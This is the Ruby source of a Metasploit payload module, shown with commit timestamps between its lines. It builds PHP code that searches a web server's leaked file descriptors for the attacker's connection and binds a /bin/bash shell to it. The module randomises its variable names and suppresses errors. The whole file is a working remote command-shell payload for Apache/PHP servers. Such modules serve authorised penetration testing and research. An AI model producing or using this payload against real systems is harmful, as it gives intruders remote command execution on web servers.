2008-09-24 04:41:51 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-09-24 04:41:51 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/payload/php'
|
|
|
|
require 'msf/core/handler/bind_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
2010-02-24 01:19:59 +00:00
|
|
|
require 'msf/base/sessions/command_shell_options'
|
2008-09-24 04:41:51 +00:00
|
|
|
require 'msf/core/handler/find_shell'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2015-03-09 20:31:04 +00:00
|
|
|
CachedSize = dynamic
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Single
|
|
|
|
include Msf::Payload::Php
|
|
|
|
include Msf::Sessions::CommandShellOptions
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'PHP Command Shell, Find Sock',
|
|
|
|
'Description' => %Q{
|
|
|
|
Spawn a shell on the established connection to
|
|
|
|
the webserver. Unfortunately, this payload
|
|
|
|
can leave conspicuous evil-looking entries in the
|
|
|
|
apache error logs, so it is probably a good idea
|
|
|
|
to use a bind or reverse shell unless firewalls
|
|
|
|
prevent them from working. The issue this
|
|
|
|
payload takes advantage of (CLOEXEC flag not set
|
|
|
|
on sockets) appears to have been patched on the
|
|
|
|
Ubuntu version of Apache and may not work on
|
|
|
|
other Debian-based distributions. Only tested on
|
|
|
|
Apache but it might work on other web servers
|
|
|
|
that leak file descriptors to child processes.
|
|
|
|
},
|
2014-07-11 17:45:23 +00:00
|
|
|
'Author' => [ 'egypt' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Handler' => Msf::Handler::FindShell,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'Arch' => ARCH_PHP
|
|
|
|
))
|
|
|
|
end
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def php_findsock
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
|
|
|
var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
|
|
|
var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
|
|
|
shell = <<END_OF_PHP_CODE
|
2008-09-30 19:56:16 +00:00
|
|
|
error_reporting(0);
|
2008-09-24 04:41:51 +00:00
|
|
|
print("<html><body>");
|
|
|
|
flush();
|
|
|
|
|
2008-09-30 19:56:16 +00:00
|
|
|
function mysystem(#{var_cmd}){
|
2013-08-30 21:28:54 +00:00
|
|
|
#{php_preamble()}
|
|
|
|
#{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}
|
|
|
|
return #{var_out};
|
2008-09-30 19:56:16 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
#{var_fd} = 13;
|
2008-09-24 04:41:51 +00:00
|
|
|
for ($i = 3; $i < 50; $i++) {
|
2013-08-30 21:28:54 +00:00
|
|
|
$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
|
|
|
|
if ($foo != $i) {
|
|
|
|
#{var_fd} = $i - 1;
|
|
|
|
break;
|
|
|
|
}
|
2008-09-24 04:41:51 +00:00
|
|
|
}
|
|
|
|
print("</body></html>\n\n");
|
|
|
|
flush();
|
|
|
|
|
2008-09-30 19:56:16 +00:00
|
|
|
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
|
|
|
|
mysystem(#{var_cmd});
|
2008-09-24 04:41:51 +00:00
|
|
|
|
|
|
|
END_OF_PHP_CODE
|
|
|
|
|
2010-02-24 01:19:59 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
return shell
|
|
|
|
end
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return php_findsock
|
|
|
|
end
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2009-02-17 06:04:02 +00:00
|
|
|
end
|